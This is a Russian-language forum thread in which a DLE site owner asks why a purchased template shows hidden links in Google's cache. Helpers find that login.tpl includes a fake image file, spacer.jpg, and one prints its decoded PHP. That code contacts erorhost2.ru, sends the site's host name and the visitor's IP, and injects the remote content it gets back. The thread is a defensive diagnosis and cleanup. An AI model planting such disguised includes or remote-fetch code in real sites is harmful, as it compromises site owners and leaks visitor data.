Форум АНТИЧАТ - Скрытые ссылки в шаблоне ДЛЕ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Скрытые ссылки в шаблоне ДЛЕ (https://forum.antichat.xyz/showthread.php?t=231537)

Здравствуйте.

Установил новый шаблон ДЛЕ. Всё было нормально и вот спустя несколько дней перешёл в кэш (Сохранённую копию) Гугла и там увидел следующие ссылки:

Цитата:

Сообщение от None

Самое интересное, что я не вижу подобных ссылок. Смотрел код в разных браузерах, заходил через анонимные прокси - ничего нет!

Изучал файлы шаблона, вроде все коды в tpl - файлах стандартные для ДЛЕ, смотрел CSS, графические файлы... Не знаю на первый взгляд ничего скрытого в шаблоне нет.

В общем Гугл видит ссылки, а я нет.

Если кто знает, посоветуйте пожалуйста, что можно сделать в данной ситуации.

Шаблон пока поменял на старый.

Не нашел в выдаче. И не нашел в шабе твоем ничего.

Цитата:

Сообщение от DCrypt

DCrypt said:
Не нашел в выдаче. И не нашел в шабе твоем ничего.

Интересно, как ты узнал какой сайт его? Их тысячи

http://siteexplorer.search.yahoo.com/search?p=http://sn27.net/&fr=sfp&bwm=i

freeman22, для начала заюзай "Антивирус" в админке DLE.

Цитата:

Сообщение от попугай

попугай said:
Интересно, как ты узнал какой сайт его? Их тысячи

Мне чел дал шаблон+линк на его сайт.

Просмотри .js фаилы. Вполне возможно, что проиклудили его в шаблон, либо изменили существующий.

с примерно таким содержанием(*.js):

Цитата:

Сообщение от None

document.write('тут всё что угодно');

+ может быть криптован\зашифрован

Вот кэш этого шаблона, посмотрите там где логин есть цифра 1 и перед ней эти ссылки.

Цитата:

Сообщение от None

http://webcache.googleusercontent.com/search?q=cache:b51CKfYyfTsJ:/page/4/+&cd=4&hl=ru&ct=clnk&gl=ru

И посмотрите сейчас какой шаблон, там этих ссылок нет!

Кстати он не бесплатный покупал здесь http://plati.ru/asp/pay.asp?id_d=927804&searchstr=youporn.ru&agent=0

Если кто сможет разобраться, где зашили эти ссылки буду благодарен.

Но деле именно в шаблоне!!! Сейчас на сайте стоит другой шаблон и Гугл не показывает никаких ссылок скрытых!

Странно..я прочесал весь шаблон с начала и до конца. Никаких шифров вроде небыло.

в login.tpl

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$void[/COLOR][COLOR="#007700"]= include ([/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/images/spacer.jpg'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

инклюдит файл ./images/spacer.jpg

там

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][/COLOR]

Декодированный

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$x0b[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"erorhost2.ru"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0d[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);

 if(![/COLOR][COLOR="#0000BB"]$x0b[/COLOR][COLOR="#007700"]){

 return[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; 

 }else{

[/COLOR][COLOR="#0000BB"]$x0e[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://erorhost2.ru/id2.php?site=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]HTTP_HOST[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]&ip=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]REMOTE_ADDR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]implode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$x0e[/COLOR][COLOR="#007700"]); 

 }

[/COLOR][/COLOR]

http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=erorhost2

попугай, большое спасибо!

Убрал в tpl строчку с инклудом и удалил spacer.jpg. Вернул шаблон, надеюсь ссылок этих больше в кэше Гугла не увижу.

P.S.Вот такую "заразу" можно и за деньги купить. Жалко, что на plati.ru претензии (с целью возврата средств) принимаются только в течении 3 дней с момента покупки товара.

Рано обрадовался.

Если просто зайти на сайт, не под админ-аккаунтом, то видна пустая страница, если вернуть $void = include ($tpl->dir.'/images/spacer.jpg'); , но при этом удалить spacer.jpg , то

Ну, естественно, удалить нужно было не одну строчку.

Вот готовый login.tpl http://pastebin.com/UfHPTxei

попугай Теперь работает. Ещё раз спасибо.

Платный шаблон еще и ссылками, в обще бес предел, такое еще в бесплатных не встречал, а в общем нужно тщательно проверять все файлы, много всяких уловок придумают, а потом удивляешься по чему взломали и или повесили табличку на сайт.